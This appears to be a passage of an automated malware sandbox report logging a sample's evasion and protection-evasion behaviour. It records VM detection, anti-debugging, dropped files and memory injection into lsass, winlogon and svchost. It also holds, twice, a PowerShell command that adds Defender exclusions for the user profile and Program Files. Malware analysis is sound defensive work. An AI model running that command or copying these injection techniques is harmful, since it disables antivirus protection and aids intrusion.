                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,20_2_00007FF603B010C0
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6506Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3248Jump to behavior
                                  Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1363
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6139
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3461
                                  Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6476
                                  Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 3524
                                  Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8539
                                  Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1337
                                  Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9867
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\IbBZTfZC.logJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\nWKkNNTp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmpJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\AvUrEmYP.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\gYWllyYA.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\OMvfRcDl.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\QWRgRujm.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\qHqBUadh.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-23511
                                  Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                  Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                  Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_8-13996
                                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                  Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                  Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_20-505
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeAPI coverage: 1.0 %
                                  Source: C:\Windows\System32\conhost.exeAPI coverage: 6.0 %
                                  Source: C:\Windows\System32\conhost.exeAPI coverage: 6.2 %
                                  Source: C:\Windows\System32\lsass.exeAPI coverage: 8.3 %
                                  Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                                  Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
                                  Source: C:\Windows\System32\svchost.exeAPI coverage: 6.5 %
                                  Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exe TID: 4320Thread sleep time: -60000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep count: 6506 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 3248 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exe TID: 2304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\dialer.exe TID: 3340Thread sleep count: 1363 > 30
                                  Source: C:\Windows\System32\dialer.exe TID: 3340Thread sleep time: -136300s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924Thread sleep count: 6139 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep time: -10145709240540247s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924Thread sleep count: 3461 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 3448Thread sleep count: 6476 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 3448Thread sleep time: -6476000s >= -30000s
                                  Source: C:\Windows\System32\winlogon.exe TID: 3448Thread sleep count: 3524 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 3448Thread sleep time: -3524000s >= -30000s
                                  Source: C:\Windows\System32\lsass.exe TID: 2316Thread sleep count: 8539 > 30
                                  Source: C:\Windows\System32\lsass.exe TID: 2316Thread sleep time: -8539000s >= -30000s
                                  Source: C:\Windows\System32\lsass.exe TID: 2316Thread sleep count: 1337 > 30
                                  Source: C:\Windows\System32\lsass.exe TID: 2316Thread sleep time: -1337000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 1216Thread sleep count: 240 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 1216Thread sleep time: -240000s >= -30000s
                                  Source: C:\Windows\System32\dwm.exe TID: 6520Thread sleep count: 9867 > 30
                                  Source: C:\Windows\System32\dwm.exe TID: 6520Thread sleep time: -9867000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 1004Thread sleep count: 252 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 1004Thread sleep time: -252000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 2724Thread sleep count: 252 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 2724Thread sleep time: -252000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 5220Thread sleep count: 252 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 5220Thread sleep time: -252000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 3412Thread sleep count: 248 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 3412Thread sleep time: -248000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 1220Thread sleep count: 198 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 1220Thread sleep time: -198000s >= -30000s
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0016A69B
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0017C220
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3455BE3C FindFirstFileExW,2_2_0000024B3455BE3C
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFDBE3C FindFirstFileExW,8_2_00000216ACFDBE3C
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFFBE3C FindFirstFileExW,13_2_1AFFBE3C
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE9BE3C FindFirstFileExW,22_2_0000013ACAE9BE3C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC64BE3C FindFirstFileExW,27_2_00000225DC64BE3C
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AEBE3C FindFirstFileExW,28_2_00000202C0AEBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66130BE3C FindFirstFileExW,30_2_000002A66130BE3C
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFBBE3C FindFirstFileExW,31_2_000002BAAEFBBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879CBE3C FindFirstFileExW,34_2_0000026A879CBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537ABE3C FindFirstFileExW,35_2_00000179537ABE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D56BE3C FindFirstFileExW,36_2_000002295D56BE3C
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017E6A3 VirtualQuery,GetSystemInfo,1_2_0017E6A3
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: wscript.exe, 00000005.00000003.1784727819.000000000341B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: wscript.exe, 00000005.00000003.1784727819.000000000341B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: svchost.exe, 0000001E.00000000.1867734999.000002A66065D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeAPI call chain: ExitProcess graph end nodegraph_1-23661
                                  Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_20-417
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0017F838
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00187DEE mov eax, dword ptr fs:[00000030h]1_2_00187DEE
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0018C030 GetProcessHeap,1_2_0018C030
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0017F838
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017F9D5 SetUnhandledExceptionFilter,1_2_0017F9D5
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0017FBCA
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00188EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00188EBD
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3455B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000024B3455B50C
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B34557E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000024B34557E70
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000216ACFDB50C
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000216ACFD7E70
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_1AFF7E70
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFFB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_1AFFB50C
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE9B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000013ACAE9B50C
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE97E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000013ACAE97E70
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000225DC647E70
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000225DC64B50C
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00000202C0AE7E70
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00000202C0AEB50C
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002A661307E70
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002A66130B50C
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002BAAEFB7E70
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002BAAEFBB50C
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0000026A879CB50C
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0000026A879C7E70
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00000179537AB50C
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00000179537A7E70
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_000002295D567E70
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_000002295D56B50C
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAEF80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
